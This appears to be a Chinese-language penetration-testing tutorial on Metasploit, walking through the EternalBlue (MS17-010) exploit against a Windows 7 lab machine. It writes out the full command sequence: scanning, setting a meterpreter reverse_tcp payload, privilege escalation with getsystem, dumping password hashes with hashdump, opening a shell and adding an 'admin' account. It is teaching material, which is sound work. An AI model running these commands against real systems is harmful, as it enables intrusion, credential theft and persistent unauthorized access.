本文內容:
~認識MSF和永恆之藍
~MSF的基礎命令
~漏洞利用基本流程
~實戰漏洞利用
額外說明:
這篇文章,僅僅作爲擴展,大家瞭解一下MSF(美少婦)
一、認識MSF和永恆之藍
1,定義
Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、
開發並對計算機軟件漏洞實施攻擊。它本身附帶數百個已知軟件漏洞的
專業級漏洞攻擊工具
我們能夠通過它發現漏洞並進行快速實施攻擊(需要在授權的情況下!)
//這款“美少婦”工具kali自帶
2,使用
第一次使用MSF,
開啓數據庫:service postgresql start
初始化msf數據庫: msfdb init
開啓MSF: msfconsole
注意:
~這是初始化msf的默認數據庫,不然運行會比較慢
以後再使用的話,就直接開啓msf即可
~MSF的啓動漫畫是隨機的
二、MSF的基礎命令
1,msf5的五大模塊
~auxiliary 輔助模塊
爲滲透測試信息蒐集提供了大量的輔助模塊支持
命名規則:
操作系統/服務/名稱
windows/smb/ms17_010_eternalblue
~Exploits 攻擊模塊
利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊,
從而獲得對遠程目標系統訪問權的代碼組件。
~Payload 攻擊載荷模塊
攻擊成功後促使靶機運行的一段植入代碼
命名規則:
操作系統/類型/名稱
windows/x64/meterpreter/reverse_tcp
~Post 後滲透攻擊模塊
收集更多信息或進一步訪問被利用的目標系統
~Encoders 編碼模塊
將攻擊載荷進行編碼,來繞過防護軟件攔截
2,常用命令
~help/? 幫助菜單
~exit 退出msf
~Back 返回
~show 顯示所給類型的模塊
例如:show auxiliary //查看輔助模塊
補充:
~rank表示好用級別:
normal(正常),
excellent(優秀),
good(良好),
average(平均)
~數字
代表一種作用,可以直接用前邊數字調用
~info 顯示一個或者多個模塊的信息
例如: info windows/smb/ms17_010_eternalblue
~search 尋找
例如:search ms17
~更新MSF:apt-get install metasploit-framework
三、漏洞利用基本流程
掃描靶機
use auxiliary/scanner/smb/smb_ms17_010 //使用輔助模塊
進入此模塊,輸入options,
在這個下,我們可以看看我們需要設置哪些參數
( Required欄爲“yes”的參數,要不是系統已經設置好的
要不就是需要我們設置的 )
例如 :我們設置rhosts, set rhosts 192.168.221.129
選擇exploit
之後出現的結果,前邊出現綠色的“[+]”且後邊出現我們的目標IP
就說明我們可以進行攻擊
back 返回上一級
use exploit/windows/smb/ms17_010_eternalblue
option看一下
set rhosts 192.168.221.129
選擇payload
set payload windows/x64/meterpreter/reverse_tcp
options看一下(因爲payload也需要設置配置)
set lhosts 192.168.221.133 //lhosts是本機IP
// 設置之後,
我們之前打進去的木馬,就會來找我們的IP
攻擊 exploit
提權 getsystem
枚舉密碼 hashdump //一般密碼都是加密的
去拿個shell shell
查看權限 whoami
在嘗試添加一個賬戶
net user admin admin /add
在看看所有用戶 net user
//本次攻擊靶機是win 7 sp1 //win 7 企業版
四、實戰漏洞利用
1,正反向連接
~正向連接 : 我們去連接木馬
~反向連接 : 木馬來連接我們 //這個更穩定一些,且不太容易被攔截
2,不熟悉的話,多練習幾遍
3,提權的原理
對面(目標)運行的一些程序具有高權限,
我們利用這個進程執行一些命令,以達到我麼的目的
iis6.0de提權 建議百度一下